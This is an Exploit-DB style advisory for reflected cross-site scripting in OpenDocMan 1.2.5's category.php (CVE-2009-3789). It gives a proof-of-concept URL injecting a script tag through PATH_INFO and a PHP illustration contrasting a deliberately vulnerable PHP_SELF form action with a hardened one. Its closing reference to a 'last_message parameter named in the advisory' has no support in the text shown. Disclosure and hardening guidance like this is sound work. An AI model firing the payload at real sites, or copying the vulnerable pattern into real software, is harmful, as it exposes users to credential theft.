ID: EDB-ID:33299
Type: exploitdb
Reporter: Amol Naik
Modified: 2009-10-21T00:00:00

Description

OpenDocMan 1.2.5 category.php XSS. CVE-2009-3789. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/36777/info
OpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OpenDocMan 1.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/opendocman/category.php/"><script>alert(1)</script><"?aku=c3VibWl0PWFkZCZzdGF0ZT0y
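The PoC above places its payload in the PATH_INFO portion of the URL, which only becomes reflected XSS when the script echoes its own request path back into the page. As an added illustration (not code from OpenDocMan or from the advisory), the following reconstructs that bug class under the assumption that a page builds its form action from $_SERVER['PHP_SELF'], and shows the hardened form beside it; the request values are constructed so it runs from the command line.

```php
<?php
// Hypothetical reconstruction of the bug class, not OpenDocMan's code.
// For a request like  GET /opendocman/category.php/"><script>alert(1)</script><"?aku=...
// PHP_SELF carries the PATH_INFO suffix verbatim, so echoing it unescaped
// into an HTML attribute reflects the payload into the page.

// Vulnerable: raw PHP_SELF inside an attribute value.
function vulnerable_form_action(): string {
    return '<form action="' . $_SERVER['PHP_SELF'] . '" method="post">';
}

// Hardened: use SCRIPT_NAME, which holds only the script path and never the
// trailing PATH_INFO, and HTML-encode it anyway as defence in depth.
function hardened_form_action(): string {
    $action = htmlspecialchars($_SERVER['SCRIPT_NAME'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form action="' . $action . '" method="post">';
}

// Constructed request values for a stand-alone run (no web server needed);
// PHP_SELF is SCRIPT_NAME followed by PATH_INFO, as a typical Apache setup sets it.
$_SERVER['SCRIPT_NAME'] = '/opendocman/category.php';
$_SERVER['PATH_INFO']   = '/"><script>alert(1)</script><"';
$_SERVER['PHP_SELF']    = $_SERVER['SCRIPT_NAME'] . $_SERVER['PATH_INFO'];

echo vulnerable_form_action(), PHP_EOL;  // attribute is broken open by the payload
echo hardened_form_action(), PHP_EOL;    // attribute stays intact
```

The same encode-before-output rule applies to the last_message parameter named in the advisory: any request-derived string written into HTML must be passed through htmlspecialchars (or an equivalent context-aware encoder) at the point of output.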